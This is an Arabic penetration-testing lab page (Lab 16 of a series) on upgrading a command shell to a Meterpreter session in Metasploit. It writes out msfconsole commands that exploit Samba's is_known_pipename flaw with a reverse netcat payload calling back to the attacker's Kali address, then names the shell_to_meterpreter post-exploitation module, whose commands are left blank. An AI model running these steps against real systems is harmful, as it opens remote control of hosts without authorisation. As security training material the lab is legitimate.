search

🧪 المختبر العملي 16: ترقية أصداف الأوامر إلى أصداف Meterpreter (Upgrading Command Shells To Mete

🎯 الهدف الأساسي: ترقية جلسة صدفة أوامر (Command Shell) عادية (التي قد تحصل عليها من استغلال بعض الثغرات) إلى جلسة Meterpreter كاملة الميزات، مما يوفر قدرات متقدمة لما بعد الاستغلال.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح صدفة أوامر (مثلاً: unix/samba/is_known_pipename من.

  • Post-Exploitation Module: post/multi/manage/shell_to_meterpreter.

📜 خطوات التنفيذ:

hashtag
📊 مرحلة الاستغلال (Exploitation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على صدفة أوامر:

    • ابدأ msfconsole:

      msfconsole -q

    • حدد عنوان IP للهدف .

    • 🔑 استخدام وحدة استغلال Samba للحصول على صدفة أوامر:

      use exploit/unix/samba/is_known_pipename
set RHOSTS [Target_IP_Address]
set LHOST [Your_Kali_IP_Address]
set LPORT 4444
set PAYLOAD cmd/unix/reverse_netcat
exploit

    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Command shell session 1 opened.

  2. 🔧 إرسال جلسة صدفة الأوامر إلى الخلفية:

    • بمجرد حصولك على صدفة الأوامر، ستحتاج إلى إرسالها إلى الخلفية لمواصلة العمل في msfconsole.

    • لإرسال الجلسة إلى الخلفية:

      background

    • إذا نفذت هذا الأمر، ستعود إلى موجه msf6> وستظل الجلسة نشطة في الخلفية.

    • للتحقق من الجلسات النشطة:

      sessions

    • إذا نفذت هذا الأمر، ستظهر لك الجلسة رقم 1 كـ Command Shell.

hashtag
📊 مرحلة ما بعد الاستغلال (Post-Exploitation): ترقية الجلسة

  1. 💡 استخدام وحدة post/multi/manage/shell_to_meterpreter لترقية الجلسة:

    • 🔑 استخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستحاول الوحدة ترقية الجلسة 1. في حال النجاح، ستظهر رسالة Meterpreter session 2 opened.

  2. ✅ التحقق من جلسة Meterpreter المرقاة:

    • للتحقق من الجلسات النشطة:

    • ستظهر لك الآن جلسة جديدة برقم 2 من نوع Meterpreter.

    • للتفاعل مع جلسة Meterpreter:

    • إذا نفذت هذا الأمر، ستدخل إلى موجه meterpreter >، ويمكنك الآن استخدام أوامر Meterpreter المتقدمة.

نقاط التحقق:

  • يجب الحصول على جلسة صدفة أوامر أولية.

  • يجب ترقية جلسة صدفة الأوامر بنجاح إلى جلسة Meterpreter.

  • يجب أن تكون قادرًا على التفاعل مع جلسة Meterpreter المرقاة.

Previous🧪 المختبر العملي 15 : استغلال خادم SMTP ضعيف (Vulnerable SMTP Server Lab)Next🧪 المختبر العملي 17: وحدات ما بعد الاستغلال في Windows (Windows Post Exploitation Modules Lab)

Last updated